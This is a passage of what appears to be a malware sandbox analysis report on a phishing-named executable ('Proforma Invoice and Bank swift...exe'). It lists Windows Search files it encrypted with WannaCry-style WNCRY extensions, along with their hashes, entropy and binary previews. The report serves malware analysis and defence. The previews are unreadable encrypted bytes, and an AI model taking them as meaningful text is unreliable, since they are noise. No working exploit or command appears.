                                                          Preview:WANACRY!.........<..O4..X...3.2.....K.JUe..6S1Q....8.vI...1..!N.grP\....x.'.......%=..z.]{k.=4.....Mz..*QF...V.....s..(.k.../wDb.'S.L.{.; .=....V.....\..h...?W./"......e"..E..>.Bv...m{.....*..jmu.oU.....b......}2v..Z/B..u.|....2iL....P!5....d.h..Y>...AU....4..........g:V.]..}1+;...". ...U>.+........STP{..?\.....F.^....u4....l#bx.#w)....k..%.4.p.A......xW.s.....N..z]w..o...|...k.......m}..|2._L.V?..=.....wY....j...`.HAzD.10}...kW.'.I.b.5~BL-j...;.m.'..xY...R.s.L..v.......:7...n/.`...Y.......x.:..GH^Y#..VW.g....P..A....j.Z../Y....;j5...t......n.".23.q.}...dMR.....W.....?.....*..O.l......` 1...U.XH..d(;0.._.~s}..Z`.?M...+..........~....@&.d~Y.b..Q..lz..!2.v...G.....B....[. ..p.Y.]R8.@...y.i...3;.0.b.Z).A.....}..t*.....!..J.Y.........F....M/s.-.K...4....T.n............j..).h..lk..9..Q....9......HH..w..*.z2.....^,G....L.m.>.s.Z..... @].t.j...O*...H......l.S.\d.....H.H. Bu.....U...|/.....F.p.2..l..l...W.H..\5.q..{...N..T...0>r;..z

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.1.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.155559774360208
                                                          Encrypted:false
                                                          SSDEEP:6:bkEMN+YDv7ACPC1phMc7qTtlH/cvAo1qeCBb+0ZzGzKaG6v:bkEgFv7ACShMc7qnH/pe0Xzkx
                                                          MD5:8E5488466976E37F5A4F761D97E79D20
                                                          SHA1:BCB5E01CDB3A973BCC0CDF7CA9B05C2EFE043990
                                                          SHA-256:CCA0089459294A491DEF796F12DD42FE5C71A89DD2DED5D81870D3E77DAEA601
                                                          SHA-512:950258A93F7B3193B6A0E13FF8C93C5180634C64BCC2B7A1647058ED8B9FE5F550BDBA00A768580FA532974DDFBAD0A8C00497F9F91542D5E7E4BD914575F503
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C....Mv.`8!..<..)B.L.Q/;..a..8Y.<.X.U.......2..!...H.%R&..0.B.H.P..+..N.U.T..u.b.D..0../Q%....g....O.^.G.-.:.m...d....R......B.!. ...t\/O|J.'..(.G. pn.....V..:q.8.=.-....w.....e.?..Q......&..:*H..c....I..P..D)...wy.2DxT....O....B..W....ojl...bZ~............m.w/.l..u..4..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.155559774360208
                                                          Encrypted:false
                                                          SSDEEP:6:bkEMN+YDv7ACPC1phMc7qTtlH/cvAo1qeCBb+0ZzGzKaG6v:bkEgFv7ACShMc7qnH/pe0Xzkx
                                                          MD5:8E5488466976E37F5A4F761D97E79D20
                                                          SHA1:BCB5E01CDB3A973BCC0CDF7CA9B05C2EFE043990
                                                          SHA-256:CCA0089459294A491DEF796F12DD42FE5C71A89DD2DED5D81870D3E77DAEA601
                                                          SHA-512:950258A93F7B3193B6A0E13FF8C93C5180634C64BCC2B7A1647058ED8B9FE5F550BDBA00A768580FA532974DDFBAD0A8C00497F9F91542D5E7E4BD914575F503
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C....Mv.`8!..<..)B.L.Q/;..a..8Y.<.X.U.......2..!...H.%R&..0.B.H.P..+..N.U.T..u.b.D..0../Q%....g....O.^.G.-.:.m...d....R......B.!. ...t\/O|J.'..(.G. pn.....V..:q.8.=.-....w.....e.?..Q......&..:*H..c....I..P..D)...wy.2DxT....O....B..W....ojl...bZ~............m.w/.l..u..4..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.2.filtertrie.intermediate.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.177486210156398
                                                          Encrypted:false
                                                          SSDEEP:6:bkEJCmDaS7t2KlEKyfEeLsAiOFM1tdvmIrMWiY3FI9fmKh7RGGX:bkE7I88pojambmapWhhtv
                                                          MD5:731682DABCE3AAF77E6D0A3E507856AD
                                                          SHA1:78A938079242C9351AC57AA0BB4F7573C71181AE
                                                          SHA-256:42EDEF115A67E36077BE14CF91FF8BD83562FC9FDEE1882293A03B35266ADB18
                                                          SHA-512:CD3EA233F710F455E973D06C48091FC161170AE6DBF86292ADA295D8A1CF84276E7502FA6FE98C309A924B418518CA56FC12712F921F285ED63E3634CB9CC2BE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......).=J.W..% .FD..............q..;....9/,.W.1g.......G....$l.!.n..vA.R....h..l!CX#rMJ-c...Rj.mr........zb.:..t....Wa_:Zg..tQ>..K.2.he>(.xhV...D.J3....D3....d.g.7.2&V...e.mo.q#q.5b.f.K..R.o.../.N-.`...Z...$Q...B...U$..6..c.~.5.....h..I................ 9.;.p3..T[..+.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.177486210156398
                                                          Encrypted:false
                                                          SSDEEP:6:bkEJCmDaS7t2KlEKyfEeLsAiOFM1tdvmIrMWiY3FI9fmKh7RGGX:bkE7I88pojambmapWhhtv
                                                          MD5:731682DABCE3AAF77E6D0A3E507856AD
                                                          SHA1:78A938079242C9351AC57AA0BB4F7573C71181AE
                                                          SHA-256:42EDEF115A67E36077BE14CF91FF8BD83562FC9FDEE1882293A03B35266ADB18
                                                          SHA-512:CD3EA233F710F455E973D06C48091FC161170AE6DBF86292ADA295D8A1CF84276E7502FA6FE98C309A924B418518CA56FC12712F921F285ED63E3634CB9CC2BE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......).=J.W..% .FD..............q..;....9/,.W.1g.......G....$l.!.n..vA.R....h..l!CX#rMJ-c...Rj.mr........zb.:..t....Wa_:Zg..tQ>..K.2.he>(.xhV...D.J3....D3....d.g.7.2&V...e.mo.q#q.5b.f.K..R.o.../.N-.`...Z...$Q...B...U$..6..c.~.5.....h..I................ 9.;.p3..T[..+.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1426184
                                                          Entropy (8bit):7.999877461155073
                                                          Encrypted:true
                                                          SSDEEP:24576:XwNgTi4o64jGC7Eo5MsUSzU47A8gSh2oDHmXVbsSuLnDnIVvicimyNZIJNg1+Zct:g135OSz9gSh2oDHCVbsrDnIVKcRyfR0K
                                                          MD5:F97497364710A7D7E2AC51DFD1367943
                                                          SHA1:7586479077AF949F6F2218C5258CD546D328141C
                                                          SHA-256:7E2AAB6F4665F58EF984ADA9A7C324BB7D0C6256E0D6335EA049194E08CB0240
                                                          SHA-512:12D02D59BA2047B03903B5771D9A79FFD463DA801DFDA7A9A7A9378DF7A6663F80EAF3678EB2378C0C8B23000F5121EAE494BB121D57112F97EC24740C41F5C7
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......'3..../>GF...sv..0.=.|...r.\.3$...2.....U2E1....#.....@..`.$u....5P^.....g>4.....3...:an.iE...4..........E..CL.i[.....X'...@...Y.?2.M2.K.BAR.z>-.nK..deG.q.l..e...3..x.....M.A.B.O.Z....b...H.:':\..Ge....(...?~:]h...*e.l.F.8/......d,.QM....-...{............d..C...yNz...1.h.y.D....b.n.;.>b.W....q.0N..j.....>n...n...?4.<m.k..nG.=}..R..tY.Ze....L..}...k.A.....0+9}A.._..;!.f.Mx9...........F.z(...EAh......K........:i..x... ..k......^.=H...|.d...V.y.....$6K]D.p..@...".`........X.w..}&.?A...0GR..m.7L...j..==..$V.1\S;s_.'B%>"....A...y..{TU1.T5^.?P...;..vb17}.....k.Q..;....q..p(.[.^..Iv.].?>.=d.S...K......I......x.^@............+%...F.....eq..*.......t.'..........R.....B.K.7.R.. ..g....E.=..?.m..>..CeD.......\.h..$.w......".O...V(...?O'...2.....=...h..6.a...6U.. .....Q..../...DX..c....{-.....vO.o#...b...Zg.q..J....C.d8tP..Z.._.{..w..F....}|.Q@.M.j<.j..O.ogS...n.1-!......D...EG....mFM.. .N..{R,6n.s9z..p0F....>*,.h$..rP..E..$^c<....;..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1426184
                                                          Entropy (8bit):7.999877461155073
                                                          Encrypted:true
                                                          SSDEEP:24576:XwNgTi4o64jGC7Eo5MsUSzU47A8gSh2oDHmXVbsSuLnDnIVvicimyNZIJNg1+Zct:g135OSz9gSh2oDHCVbsrDnIVKcRyfR0K
                                                          MD5:F97497364710A7D7E2AC51DFD1367943
                                                          SHA1:7586479077AF949F6F2218C5258CD546D328141C
                                                          SHA-256:7E2AAB6F4665F58EF984ADA9A7C324BB7D0C6256E0D6335EA049194E08CB0240
                                                          SHA-512:12D02D59BA2047B03903B5771D9A79FFD463DA801DFDA7A9A7A9378DF7A6663F80EAF3678EB2378C0C8B23000F5121EAE494BB121D57112F97EC24740C41F5C7
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......'3..../>GF...sv..0.=.|...r.\.3$...2.....U2E1....#.....@..`.$u....5P^.....g>4.....3...:an.iE...4..........E..CL.i[.....X'...@...Y.?2.M2.K.BAR.z>-.nK..deG.q.l..e...3..x.....M.A.B.O.Z....b...H.:':\..Ge....(...?~:]h...*e.l.F.8/......d,.QM....-...{............d..C...yNz...1.h.y.D....b.n.;.>b.W....q.0N..j.....>n...n...?4.<m.k..nG.=}..R..tY.Ze....L..}...k.A.....0+9}A.._..;!.f.Mx9...........F.z(...EAh......K........:i..x... ..k......^.=H...|.d...V.y.....$6K]D.p..@...".`........X.w..}&.?A...0GR..m.7L...j..==..$V.1\S;s_.'B%>"....A...y..{TU1.T5^.?P...;..vb17}.....k.Q..;....q..p(.[.^..Iv.].?>.=d.S...K......I......x.^@............+%...F.....eq..*.......t.'..........R.....B.K.7.R.. ..g....E.=..?.m..>..CeD.......\.h..$.w......".O...V(...?O'...2.....=...h..6.a...6U.. .....Q..../...DX..c....{-.....vO.o#...b...Zg.q..J....C.d8tP..Z.._.{..w..F....}|.Q@.M.j<.j..O.ogS...n.1-!......D...EG....mFM.. .N..{R,6n.s9z..p0F....>*,.h$..rP..E..$^c<....;..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):352008
                                                          Entropy (8bit):7.999490804583247
                                                          Encrypted:true
                                                          SSDEEP:6144:23WB5XU/RC2QOfJR9tLWO3MCD4ZmnBchrUe85z+SqMtbcWjJ/mnND2zGZ0p:Ry3hH1CZZmBmO5zF7LJOnND2z5p
                                                          MD5:D1A4954D7C7765AA58ABB84DA0EC97ED
                                                          SHA1:4BD05B8EC7565AC2BAAAD13FCFECB5C96BEC5C41
                                                          SHA-256:3021864C78866E9A64850D4CC54EA22596A327273C3CE18DC1A042DEB78B4F45
                                                          SHA-512:B32F185208CDBCA286BA4B149752BF57C729A45B4ABB41943F2652ACB98FE9E9CA53EA071E88AFC19F73AE4E60C76591B5F60593494F79C584117A398F07BBE2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....;>....C....C6..sG"*...*....M.X..K..ND ...n.v.B.>..]a.$u.<.)..3...TtP..'z=.$....A:........4.9........X..RR~.z2!...f.l"...)H..lN.....Q.....&7..%.>4........DU.....A...7-.`P.H.J...J.W*..B}...B.YB].AS.+..<..v..U9..Vp.QO..W.r..WVs....o..5...'..W.....]......k...a.l 1..]2.P) ...S..|..t._..Q`60....mb.\b.q...{..B.|.}.gb.l.03.=|{.9)...t...n.j .E.W...n..._.H...\..w....^.$...........$."..XaM...5`.u....P...5...^.Qi.D.V..M.@.....C]..$S..Z......-.../..........].,..`.xa.|Y~.....P..G...3....{......F.U/<.\(.t..e..I.l.....q..3/..\.q....?Y..y.].t..wWW.w... u.'g..BTu...gz.9S.|.p2.`y.Y.n..u5..{.Xw.v(...I..vE.;.V=.r.8...uZ..N.-.9.X...jAz...7....+..9...\...e.N.A....W.........5.3.L'9..I...u..Z...`...{~....u]L....c..0.S<Qh..m.].KT.t......)...,*t...F..@.R.>..$0vf.?..4...P..+C.>9...#..S...2.)...=.1.N.. ......r.Z.....}.+.....6&....w..6WgXP#i..9....X...uz...p&...!.f........_.Hf...9...X......ia.i.I.ELX...{<D.Jc4eVA.e.b*Z_b`!..N..`....S%..D..BV..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):352008
                                                          Entropy (8bit):7.999490804583247
                                                          Encrypted:true
                                                          SSDEEP:6144:23WB5XU/RC2QOfJR9tLWO3MCD4ZmnBchrUe85z+SqMtbcWjJ/mnND2zGZ0p:Ry3hH1CZZmBmO5zF7LJOnND2z5p
                                                          MD5:D1A4954D7C7765AA58ABB84DA0EC97ED
                                                          SHA1:4BD05B8EC7565AC2BAAAD13FCFECB5C96BEC5C41
                                                          SHA-256:3021864C78866E9A64850D4CC54EA22596A327273C3CE18DC1A042DEB78B4F45
                                                          SHA-512:B32F185208CDBCA286BA4B149752BF57C729A45B4ABB41943F2652ACB98FE9E9CA53EA071E88AFC19F73AE4E60C76591B5F60593494F79C584117A398F07BBE2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....;>....C....C6..sG"*...*....M.X..K..ND ...n.v.B.>..]a.$u.<.)..3...TtP..'z=.$....A:........4.9........X..RR~.z2!...f.l"...)H..lN.....Q.....&7..%.>4........DU.....A...7-.`P.H.J...J.W*..B}...B.YB].AS.+..<..v..U9..Vp.QO..W.r..WVs....o..5...'..W.....]......k...a.l 1..]2.P) ...S..|..t._..Q`60....mb.\b.q...{..B.|.}.gb.l.03.=|{.9)...t...n.j .E.W...n..._.H...\..w....^.$...........$."..XaM...5`.u....P...5...^.Qi.D.V..M.@.....C]..$S..Z......-.../..........].,..`.xa.|Y~.....P..G...3....{......F.U/<.\(.t..e..I.l.....q..3/..\.q....?Y..y.].t..wWW.w... u.'g..BTu...gz.9S.|.p2.`y.Y.n..u5..{.Xw.v(...I..vE.;.V=.r.8...uZ..N.-.9.X...jAz...7....+..9...\...e.N.A....W.........5.3.L'9..I...u..Z...`...{~....u]L....c..0.S<Qh..m.].KT.t......)...,*t...F..@.R.>..$0vf.?..4...P..+C.>9...#..S...2.)...=.1.N.. ......r.Z.....}.+.....6&....w..6WgXP#i..9....X...uz...p&...!.f........_.Hf...9...X......ia.i.I.ELX...{<D.Jc4eVA.e.b*Z_b`!..N..`....S%..D..BV..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):243784
                                                          Entropy (8bit):7.999077138822792
                                                          Encrypted:true
                                                          SSDEEP:6144:QpMSLU/XdP1rUrtMTy2bDQMQ6JpwXi9Ja0UQLZSZ6L:QZQvTrmMTbDQMQ6JpOi9ktQLZGK
                                                          MD5:D2EB34B4B958BAE0827346E106D5D148
                                                          SHA1:91DF130EDDC9FD324F22D93C6064E616F038F930
                                                          SHA-256:8E0D3143227F44C0E1FFB6B8024EFB95CE0A3569A9E624A9FFC21374FCE40AC0
                                                          SHA-512:9C0734A7D56B0DBB88C9B1C03E5E320B76C5E2761AC1716B865E3EB124915A84BE658C131256F9DF1E7DF8ACEE3C2C270E3DBFB0587AA98B230F2A6BBE3E0550
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."..TF)".......].PX......zZ.aT..c..C..}.G...&.B."OU...|z&.b...o.^..#.!f.9..E_0.l..m8*,.H....;"O......{.......%...s"..~.......Ng..@.T./R.f..u....r.|.9...4`....r..J.U...."..N.sh.t.."....".V..`.).F...#..0kr..1@..R.H.._.td:h.S..g....'.z."].\7wj'..~.}....&.......]:e..m.M...BR.....Q!U.H......|.....%...K.C.........s..f......o....&U.gd...PM.A...eR..ds..xwIS?.V4..5.c..%.9.7......6"N..s0...}J.E=..-nj....y..x((.N.4...y..........k.Y......R..u.7'....|/...2P>.@^!.j..P.=.&..=...k....U.r.....).?.j.b.V....x......u9o...].P5.:.NZ.....'.U.#]..{..+..........g.~.3...n.W..........*Qq.OD#{B....._.Q..j.k.k....YG..V.>a..0.N.j,..".qQA/.m.6.G....Bd.?l.x7.`w.l.L.$..o....N_..Y)..P......P..[..,......3.Y\G&..wj..a..{.d.Q8L...{......O...]....|..".. ..3..P..l..d.f..dS.q.N..M....%.L.E.S..H..o;."..6?k...&...Z:...w.iN.EV...%....hf.......%.^.k#..Wf.I.d.:.bV.!.|.v.......4..$j.....V..6....'..H... ...h..wN..B_..{....h..%W..$..9.5w.......!....H...+n..#...q.....y....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):243784
                                                          Entropy (8bit):7.999077138822792
                                                          Encrypted:true
                                                          SSDEEP:6144:QpMSLU/XdP1rUrtMTy2bDQMQ6JpwXi9Ja0UQLZSZ6L:QZQvTrmMTbDQMQ6JpOi9ktQLZGK
                                                          MD5:D2EB34B4B958BAE0827346E106D5D148
                                                          SHA1:91DF130EDDC9FD324F22D93C6064E616F038F930
                                                          SHA-256:8E0D3143227F44C0E1FFB6B8024EFB95CE0A3569A9E624A9FFC21374FCE40AC0
                                                          SHA-512:9C0734A7D56B0DBB88C9B1C03E5E320B76C5E2761AC1716B865E3EB124915A84BE658C131256F9DF1E7DF8ACEE3C2C270E3DBFB0587AA98B230F2A6BBE3E0550
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."..TF)".......].PX......zZ.aT..c..C..}.G...&.B."OU...|z&.b...o.^..#.!f.9..E_0.l..m8*,.H....;"O......{.......%...s"..~.......Ng..@.T./R.f..u....r.|.9...4`....r..J.U...."..N.sh.t.."....".V..`.).F...#..0kr..1@..R.H.._.td:h.S..g....'.z."].\7wj'..~.}....&.......]:e..m.M...BR.....Q!U.H......|.....%...K.C.........s..f......o....&U.gd...PM.A...eR..ds..xwIS?.V4..5.c..%.9.7......6"N..s0...}J.E=..-nj....y..x((.N.4...y..........k.Y......R..u.7'....|/...2P>.@^!.j..P.=.&..=...k....U.r.....).?.j.b.V....x......u9o...].P5.:.NZ.....'.U.#]..{..+..........g.~.3...n.W..........*Qq.OD#{B....._.Q..j.k.k....YG..V.>a..0.N.j,..".qQA/.m.6.G....Bd.?l.x7.`w.l.L.$..o....N_..Y)..P......P..[..,......3.Y\G&..wj..a..{.d.Q8L...{......O...]....|..".. ..3..P..l..d.f..dS.q.N..M....%.L.E.S..H..o;."..6?k...&...Z:...w.iN.EV...%....hf.......%.^.k#..Wf.I.d.:.bV.!.|.v.......4..$j.....V..6....'..H... ...h..wN..B_..{....h..%W..$..9.5w.......!....H...+n..#...q.....y....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):533032
                                                          Entropy (8bit):7.999686835672844
                                                          Encrypted:true
                                                          SSDEEP:12288:zfv9K4I8yI2pERjY1+ncIadU3Hr0vCAuCguC/kbnizEUL:TXVZY1+nc5dmr0vFXguCanM
                                                          MD5:334108536186C71B9816E52CB87B9B7D
                                                          SHA1:B3971A8DAA398E60578A1301832087207069EF76
                                                          SHA-256:162CC8A664BE87C746F4ED1AA292E9C9EC51DD154FCE1B833338636B759732A3
                                                          SHA-512:CBEC6FF86EC78D2B1ED26A1F68E252BDFE24BE9F70FF40D203D495BCB4A7420E9DFCB70ADF37C480DFE04545829C6E30A289C43055733BE885D0E8BFCE5DF373
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....(.(.."...g..U.&e...\u....dE..7.&...Pt....)..s...q..?..@...~....+.},.D6....T^....E...z.4..8..m..a.=2N...%..ZV.,..q._.f{..../2...B...i.:..."...@...yu..5k..},.6.L.....3...,z..!...V.b6...@JEz}.A..!.T.'<..{..[..M<d..FF...a...j9...Q*=.....qj.aZ.e.|?......!........._.....U...;..TI.7+..z.V...}.{A.-.1.8W....e...... ...........%...e..|.C..EP)|2,...d..<#f._R)k..!m..CQ.%....#..~....K.`.*W5&..^.p...<B....G...#]..d.a.......V..\....|.)P..<..Sk.......Y.P...6.E../......A?n.c.g.KSt}...+..Wc.=...`.J.nG...%.qk& ...z....U|&...EO.Y.KS....U..iZv....D....=E...I...w`T:.........t.[]J....n..n.....A...s..4V>$U..KSn.].3...Z.v.....5.)E)..g...bwAP...3vb..Sa.+.B........}-....w.A=%=5q.....3..^B....fbb...}[3e....O...KC...A%7.a.q.Fn..A......9...1......P..O.V.%t.k...<Y).W /..TFK.$.c..G.....A..\^.y..M....o+...wh..eG...Vr.)...... .b.y._.mb...BH;H.3..a.;?..c.....=h......WB...BT..-......IV.......!...!.hda....gvC.i7. ....@..b@....f.d.....;9.....FX....P(,.,.~...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):533032
                                                          Entropy (8bit):7.999686835672844
                                                          Encrypted:true
                                                          SSDEEP:12288:zfv9K4I8yI2pERjY1+ncIadU3Hr0vCAuCguC/kbnizEUL:TXVZY1+nc5dmr0vFXguCanM
                                                          MD5:334108536186C71B9816E52CB87B9B7D
                                                          SHA1:B3971A8DAA398E60578A1301832087207069EF76
                                                          SHA-256:162CC8A664BE87C746F4ED1AA292E9C9EC51DD154FCE1B833338636B759732A3
                                                          SHA-512:CBEC6FF86EC78D2B1ED26A1F68E252BDFE24BE9F70FF40D203D495BCB4A7420E9DFCB70ADF37C480DFE04545829C6E30A289C43055733BE885D0E8BFCE5DF373
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....(.(.."...g..U.&e...\u....dE..7.&...Pt....)..s...q..?..@...~....+.},.D6....T^....E...z.4..8..m..a.=2N...%..ZV.,..q._.f{..../2...B...i.:..."...@...yu..5k..},.6.L.....3...,z..!...V.b6...@JEz}.A..!.T.'<..{..[..M<d..FF...a...j9...Q*=.....qj.aZ.e.|?......!........._.....U...;..TI.7+..z.V...}.{A.-.1.8W....e...... ...........%...e..|.C..EP)|2,...d..<#f._R)k..!m..CQ.%....#..~....K.`.*W5&..^.p...<B....G...#]..d.a.......V..\....|.)P..<..Sk.......Y.P...6.E../......A?n.c.g.KSt}...+..Wc.=...`.J.nG...%.qk& ...z....U|&...EO.Y.KS....U..iZv....D....=E...I...w`T:.........t.[]J....n..n.....A...s..4V>$U..KSn.].3...Z.v.....5.)E)..g...bwAP...3vb..Sa.+.B........}-....w.A=%=5q.....3..^B....fbb...}[3e....O...KC...A%7.a.q.Fn..A......9...1......P..O.V.%t.k...<Y).W /..TFK.$.c..G.....A..\^.y..M....o+...wh..eG...Vr.)...... .b.y._.mb...BH;H.3..a.;?..c.....=h......WB...BT..-......IV.......!...!.hda....gvC.i7. ....@..b@....f.d.....;9.....FX....P(,.,.~...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44792
                                                          Entropy (8bit):7.995800987643325
                                                          Encrypted:true
                                                          SSDEEP:768:obwVik/2osBaei4jtkCtLNRNiwj8iIa+3NIyYIi8zoyMxjLsrGWOtqPtv+xw:oBknMFkKIwIiK2yYTKcjL9/AF+a
                                                          MD5:9B617B06CC8CDAC8F73A6CB2AE7D865F
                                                          SHA1:DF59B63B9F298166F0F1B9FC88DC972471464FE6
                                                          SHA-256:48DD6E984CC2196C467499D1CD82DBF7809F37F09EA62123F2CFBA69A81C2531
                                                          SHA-512:AFCA7B35827D49C69318F9F547E9540914D889666EB6BEC6E205FC2B92E154DA89D2D46F123DA8853189AC23E734597863A52EEA1596461343A6571097336760
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....g....0..1....@..XJ......}.y..`.^'B..BSG...V....../.s._t;.e7|^....Y......,.a.#.Nx.j...m..^-!.R...J...D........4#g/<>c.ba$........b.....'!s......@m..Q[...cD&=..Z.B.{FT..O~qB.e..>...)a...o........G....c.U.L..h.....\h....R)7....#+..t.*Q.t...+v..............C.%^.D`...,]..kG.........a....1X...F.f..&.TS....K........"..p..I-.....1...'zD.<...PH..&.........."...8.[.OC.p.2..4....`..L.P..D...Ak.:.oB!..e../'-W.@..;...K.....@....=+"r.4........3.."....x.k.KX.....^....+#...{...-.r{.C..........1...Mi......&.....S....m.....Q8,p9...e......f]]....o....7.....j..<#.4..].k...5..nc.."...KP!....=..h?.0....6V':.q.Y./.!.....2T?.W.....~B.....'..7.;Ts.If....V.H.ALk..."H,VZ.C...0a...H.?.Y4.z.dC...NK.+..[.J...(.OU&..U....ks.7..DV.5f..N...........K.'1..N....~.F....]?..j1MT%G..:.....Sq...-....u........h.$J......N<.,....n...k..n...wL.^Hq"..M..^...xn.s.g.j.l..E.=Nw...q..-m..#...,(.....Tt......U...K.(b....;.,.7bLe~o.\."......P.2.t..\..)B..).S*..>CNV.%..9....t..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44792
                                                          Entropy (8bit):7.995800987643325
                                                          Encrypted:true
                                                          SSDEEP:768:obwVik/2osBaei4jtkCtLNRNiwj8iIa+3NIyYIi8zoyMxjLsrGWOtqPtv+xw:oBknMFkKIwIiK2yYTKcjL9/AF+a
                                                          MD5:9B617B06CC8CDAC8F73A6CB2AE7D865F
                                                          SHA1:DF59B63B9F298166F0F1B9FC88DC972471464FE6
                                                          SHA-256:48DD6E984CC2196C467499D1CD82DBF7809F37F09EA62123F2CFBA69A81C2531
